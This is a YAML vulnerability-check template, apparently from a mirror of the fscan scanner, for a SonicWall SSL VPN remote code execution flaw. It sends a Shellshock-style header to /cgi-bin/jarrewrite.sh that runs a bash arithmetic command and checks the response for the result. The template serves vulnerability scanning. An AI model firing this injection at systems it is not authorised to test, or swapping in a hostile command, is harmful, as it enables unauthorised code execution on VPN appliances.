mirror of https://github.com/qwqdanchun/fscan.git
17 lines
485 B
YAML
17 lines
485 B
YAML
name: poc-yaml-sonicwall-ssl-vpn-rce
|
|
set:
|
|
r1: randomInt(40000, 44800)
|
|
r2: randomInt(1140000, 1144800)
|
|
rules:
|
|
- method: GET
|
|
path: /cgi-bin/jarrewrite.sh
|
|
follow_redirects: false
|
|
headers:
|
|
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
|
|
detail:
|
|
author: sharecast
|
|
links:
|
|
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|